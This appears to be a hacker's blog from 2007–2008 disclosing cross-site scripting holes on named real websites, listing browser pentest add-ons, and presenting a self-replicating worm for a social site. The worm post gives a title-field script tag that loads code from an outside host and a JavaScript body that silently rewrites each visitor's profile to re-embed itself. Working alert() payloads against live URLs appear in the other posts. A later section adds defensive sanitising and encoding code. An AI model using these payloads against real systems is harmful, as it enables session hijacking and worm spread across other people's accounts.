Posted on 29 February, 2008 by nigon
new year, new site, new…xsses
http://www.btv.bg/horoscope/daily_horoscope.pcgi?sign_id=
"][/img][/h3][script]alert('nigonized')[/script]<!--
search box xss vuln:
"][script]alert('nigonized')[/script]<!--
to be continued….
Filed under: XSS, coding, security, web
Posted on 19 February, 2008 by nigon
HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]
SwitchProxy Tool [ https://addons.mozilla.org/en-US/firefox/addon/125 ]
Foxy Proxy [ https://addons.mozilla.org/en-US/firefox/addon/2464 ]
Reload Every [ https://addons.mozilla.org/en-US/firefox/addon/115 ]
User Agent Switcher [ https://addons.mozilla.org/en-US/firefox/addon/59 ]
View Cookies [ https://addons.mozilla.org/en-US/firefox/addon/3587 ]
Modify Headers [ https://addons.mozilla.org/en-US/firefox/addon/967 ]
TiX Now! [ https://addons.mozilla.org/en-US/firefox/addon/3601 ]
Wmlbrowser [ https://addons.mozilla.org/en-US/firefox/addon/62 ]
XSSMe [ http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi ]
SQL [...]
Filed under: XSS, firefox, security, web
Posted on 6 February, 2008 by nigon
impulse.bg allows HTML in the "title" field, just as myspace.com does, with the small difference that there are no restrictions.
One thing stands out immediately:
GET /js/scriptaculous/scriptaculous.js
which by itself makes our task easier and more elegant. Placing something like the following in the "Title" ("Заглавие") field:
{script src="www.mysite.com/impulse.js"}{/script}
impulse.js contents:
// Body of the profile-update form; the title field carries the same script tag again.
var params = "name=wormy!&email=nigon.hacked.in%40gmail.com&country=1&city_id=5&" +
    "city=&birthday=11&birthmonth=8&birthyear=1980&gender=1&" +
    "search_gender=2&height=0&weight=0&eyes=0&hair=0&" +
    "occupation=0&smoke=1&alchohol=1&title=%3Cscript%20src" +
    "%3D%22http%3A%2F%2Fmysite.com/impulse.js%22%3E%3C%2Fscript%3E&" +
    "info=&msg_report=1&comment_report=1&" +
    "Submit=%D0%9F%D1%80%D0%BE%D0%BC%D0%B5%D0%BD%D0%B8";
// Ajax.Request comes from the Prototype library that scriptaculous.js builds on.
var MyAjax = new Ajax.Request('/myinfo', {
    method: 'post',
    parameters: params
});
result:
on every visit [...]
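The defensive counterpart to the behaviour described above, as an added example that is not from the original post or from impulse.bg: a server-side check that flags markup in the plain-text fields of the profile-update body and HTML-encodes the title at output. Only the parameter names (`name`, `title`, `info`) come from the post; the function names, the `profile-title` class and the sample request bodies are constructed for illustration.

```javascript
// Added example (not the site's code). Function names and samples are assumptions.

// Encode the characters that let text break out of HTML content or attributes.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Fields shown as plain text on the profile page; none should carry markup.
const PLAIN_TEXT_FIELDS = ['name', 'title', 'info'];

// Parse a urlencoded profile-update body and list the plain-text fields that
// contain tag-like content. This is for logging and alerting only; the actual
// control is the output encoding in renderTitle().
function inspectProfileUpdate(body) {
  const params = new URLSearchParams(body);
  const findings = [];
  for (const field of PLAIN_TEXT_FIELDS) {
    const value = params.get(field) || '';
    if (/<\s*\/?\s*[a-z!]/i.test(value)) {
      findings.push(field);
    }
  }
  return { params, findings };
}

// Render the title for the profile page. Encoding happens at output, so a value
// stored before the fix was deployed is neutralised as well.
function renderTitle(params) {
  return '<h3 class="profile-title">' + escapeHtml(params.get('title') || '') + '</h3>';
}

// Constructed sample bodies (example.invalid is a placeholder host).
const SAMPLE_BENIGN = 'name=ivan&title=Hello%20%26%20welcome&info=';
const SAMPLE_SCRIPT = 'name=wormy!&title=%3Cscript%20src%3D%22http%3A%2F%2F' +
  'example.invalid%2Fx.js%22%3E%3C%2Fscript%3E&info=';

for (const body of [SAMPLE_BENIGN, SAMPLE_SCRIPT]) {
  const { params, findings } = inspectProfileUpdate(body);
  console.log(findings.length ? 'FLAGGED: ' + findings.join(',') : 'ok', '->', renderTitle(params));
}
```

Because the injected script runs inside the visitor's own session, the POST to `/myinfo` looks like any other profile update; encoding the stored value at render time is what stops the script from executing in the first place.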
Filed under: XSS, security, web
Posted on 30 November, 2007 by nigon
Nothing special…
http://arenabg.com/series.php?q=
">'>alert(String.fromCharCode(110,105,103,111,110,105,122,101,100))
Filed under: XSS, security